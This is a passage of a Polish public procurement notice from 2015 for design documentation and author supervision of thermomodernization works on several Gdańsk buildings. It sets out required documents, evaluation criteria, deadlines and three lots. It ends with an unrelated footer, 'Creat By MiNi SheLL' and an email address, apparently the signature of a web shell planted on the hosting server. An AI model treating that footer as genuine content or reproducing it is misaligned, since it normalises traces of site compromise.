W przypadku składania oferty tylko i wyłącznie na zadanie 3 opracowanie dokumentacji projektowej obejmujące branże architektoniczną, konstrukcyjną i instalacyjne remontów obiektów o wartości minimum 20 000,00 zł brutto 
Zamawiający nie żąda informacji o usługach niewykonanych lub wykonanych nienależycie;;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	Złożyć Druk  OFERTA, który należy sporządzić wg wzoru druku zamawiającego.<br>
b)	Podać w złożonej ofercie części zamówienia, których wykonanie zamierza powierzyć podwykonawcy lub nazwy podwykonawców, na których zasoby wykonawca powołuje się, w celu wykazania spełnienia warunku udziału w postępowaniu. W przypadku nie wskazania podwykonawców, zamawiający uzna, że całość zamówienia będzie wykonywana przez Wykonawcę osobiście.<br>
c)	Udzielić rękojmi za dzieło na okres  minimum :<br>
		Zadanie 1  -  24 miesiące<br>
		Zadanie 2  -  36 miesięcy<br>
		Zadanie 3  -  48 miesięcy<br>
d)	Podać w złożonej ofercie termin realizacji prac projektowych odpowiednio na wybrane zadanie.<br>
		Maksymalny termin wykonania  prac projektowych na poszczególnych zadaniach nie może być dłuższy niż 90 	dni. Nie spełnienie tego wymogu spowoduje odrzucenie oferty.<br>
e)	Złożyć Formularz cenowy, odpowiednio na wybrane zadanie, który należy sporządzić wg wzoru druku Zamawiającego. <br>
f)	Załączyć kopię dowodu wpłaty wadium wpłaconego w pieniądzu lub oryginał albo kopię wadium 	wniesionego w jednej z form określonych w punkcie 14 SIWZ.<br>
g)	Wykazać, że oferta została podpisana przez osobę/y uprawnioną/e do występowania w imieniu i na rzecz wykonawcy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.80</li>
<li>2 - termin wykonania prac projektowych - 0.20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Następujące postanowienia umowy mogą ulec zmianie:<br>
1)	Przesunięciu może ulec termin wykonania przedmiotu zamówienia w zakresie realizacji prac projektowych,<br>
2)	Przesunięciu może ulec termin wykonania przedmiotu zamówienia w zakresie realizacji nadzorów 	autorskich,<br>
2. Zmiany w umowie mogą zostać wprowadzone przy zaistnieniu następujących udokumentowanych okoliczności:<br>
1)	Zmiany będące następstwem działania organów administracji, które powodowały niezawinione i niemożliwe 	do 	uniknięcia przez Wykonawcę opóźnienie w szczególności:<br>
- przekroczenie zakreślonych przez prawo lub regulaminy, a jeśli takich regulacji nie ma - typowych w danych 	okolicznościach, terminów wydawania przez organy administracji lub inne podmioty decyzji, zezwoleń, 	uzgodnień w tym terminu przedłożonych do uzgodnień wariantów koncepcji, itp,<br>
- odmowa wydania przez organy administracji lub inne podmioty wymaganych decyzji, zezwoleń, uzgodnień z przyczyn niezawinionych przez Wykonawcę,<br>
- gdy uzgodnienia dotyczące zatwierdzenia koncepcji przebudowy lokali celem ich usamodzielnieniabedą trwały powyżej 21 dni (dotyczy zadania 1 i 2 )<br>
- gdy uzgodnienia między innymi z Konserwatorem Zabytków oraz Pomorskim Komendantem Wojewódzkiej 	Państwowej Straży Pożarnej będą trwały ponad trzy tygodnie.<br>
2)	Termin wykonania umowy na nadzory autorskie może ulec przesunięciu w przypadku zmiany terminów 	realizacji robót budowlanych objętych projektami wykonanymi na podstawie niniejszego zamówienia.<br>
3)	W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt od 1) do 2) termin wykonania 	umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej 	przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gznk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 80-171 Gdańsk, ul. Cygańska Góra 1, pok. nr 11 w godz. 9:00 - 12:00. <br>Cena brutto - 49,20 PLN.<br>
Warunki i sposób płatności: gotówka, zaliczenie pocztowe, przelew.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.05.2015 godzina 10:00, miejsce: siedziba Zamawiającego, 80-171 Gdańsk, ul. Cygańska Góra 1, pokój nr 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 12.06.2015.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> DATA, GODZINA I MIEJSCE OTWARCIA OFERT: 14.05.2015 r. godzina  10:15, <br>
miejsce w siedzibie zamawiającego, 80-171 Gdańsk ul. Cygańska Góra 1, w  pokoju nr 6 - świetlica<br>

OSOBY UPRAWNIONE DO POROZUMIEWANIA SIĘ Z WYKONAWCAMI <br>
Grażyna Pietrowska stanowisko służbowe specjalista ds. zamówień publicznych, 
80- 171 Gdańsk ul. Cygańska Góra 1, nr pok. 11, tel.  58 320 02 20<br>
Adres poczty elektronicznej: pietrowska@gznk.pl<br>

ZASADY WYKLUCZENIA WYKONAWCY <br>
Z postępowania o udzielenie zamówienia Zamawiający wykluczy również wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych.<br>
Zamawiający nie wykluczy z postępowania o udzielenie zamówienia publicznego wykonawcy, który udowodnił, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mając zapobiec zawinionemu i poważnemu naruszeniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> opracowanie dokumentacji wielobranżowej projektowo - kosztorysowej termomodernizacji budynków przy ul. Chłodnej 9 i 10 oraz sprawowanie  nadzorów autorskich nad robotami wykonywanymi  według sporządzonej dokumentacji projektowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie:<br>
a)	dokumentacji wielobranżowej projektowo - kosztorysowej termomodernizacji budynków  mieszkalnych i  wykonanie audytów energetycznych dla budynków przy ul. Chłodnej 9 (działka Nr 153/6 obr.100) i  Chłodnej 10 (działka nr 151 i 152 obr. 100)  wraz z przebudową  lokali celem ich usamodzielnienia, zgodnie z planem zagospodarowania terenu w zakresie wymaganym prawem budowlanym i przepisami wykonawczymi w oparciu o wytyczne Wojewódzkiego Urzędu Ochrony Zabytków w Gdańsku - Pomorskiego Wojewódzkiego Konserwatora Zabytków z dnia 05.01.2015 r. <br>
b)	sprawowanie nadzorów autorskich nad robotami wykonywanymi według sporządzonej dokumentacji projektowej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.22.10.00-3, 71.24.80.00-8, 71.32.00.00-7, 71.31.43.00-5, 71.31.40.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.80</li>
<li>2. termin wykonania zamówienia - 0.20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> opracowanie dokumentacji wielobranżowej projektowo - kosztorysowej termomodernizacji budynków przy ul. Chłodnej 14 i Toruńskiej 23 oraz sprawowanie nadzorów autorskich nad robotami wykonywanymi według sporządzonej dokumentacji projektowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie:<br>
a)	dokumentacji wielobranżowej projektowo - kosztorysowej termomodernizacji budynków  mieszkalnych i wykonanie audytów energetycznych dla budynków przy ul. Chłodnej 14 (działka nr 139 obr. 100) i Toruńskiej 23 (działka nr 184/1) wraz z przebudową  lokali celem ich usamodzielnienia, zgodnie z planem zagospodarowania terenu w zakresie wymaganym prawem budowlanym i przepisami wykonawczymi w oparciu o wytyczne Wojewódzkiego Urzędu Ochrony Zabytków w Gdańsku - Pomorskiego Wojewódzkiego Konserwatora Zabytków z dnia 05.01.2015 r. <br>
b)	sprawowanie nadzorów autorskich nad robotami wykonywanymi według sporządzonej dokumentacji projektowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.22.10.00-3, 71.24.80.00-8, 71.32.00.00-7, 71.31.43.00-5, 71.31.40.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.80</li>
<li>2. termin wykonania zamówienia - 0.20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> opracowanie dokumentacji wielobranżowej projektowo - kosztorysowej termomodernizacji budynków przy ul. ul Mściwoja II 44 oraz sprawowanie nadzorów autorskich nad robotami wykonywanymi  według sporządzonej dokumentacji projektowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie:<br>
a)	opracowanie dokumentacji wielobranżowej projektowo - kosztorysowej termomodernizacji budynku  użytkowego siedziby BOM 7 GZNK SZB przy ul Mściwoja II 44 (działki nr 308, 309, 310, 311, 312  obr.016), zgodnie z planem zagospodarowania terenu w zakresie wymaganym prawem budowlanym i przepisami wykonawczymi. <br>
b)	sprawowanie nadzorów autorskich nad robotami wykonywanymi według sporządzonej dokumentacji projektowej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.22.10.00-3, 71.24.80.00-8, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2018.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.80</li>
<li>2. termin wykonania zamówienia - 0.20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com